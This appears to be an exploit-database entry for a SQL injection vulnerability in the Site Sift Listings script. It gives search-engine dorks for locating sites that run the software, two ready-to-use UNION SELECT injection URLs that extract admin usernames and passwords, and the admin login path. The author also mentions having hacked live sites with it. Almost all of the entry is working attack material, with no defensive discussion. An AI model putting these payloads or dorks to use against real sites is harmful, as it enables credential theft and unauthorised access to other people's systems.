id: 2830
date: 04/05/2008
title: Site Sift Listings (id) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

==========================================================
Site Sift Listings (id) Remote SQL Injection Vulnerability
==========================================================



##########################################
#
# powered by Site Sift scripts SQL Injection
#
###########################################
#
# DORK 1 : powered by Site Sift
#
# DORK 2 : allinurl: "index php go addpage"
#
# DORK 2 : allinurl: "index.php?go=detail id="
#
###########################################
EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

EXPLOIT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*


ADMiN LOGiN::admin/login.php

note: i hacked sex and porn sites :(( but not changed pass



#  0day.today [2023-03-21]  #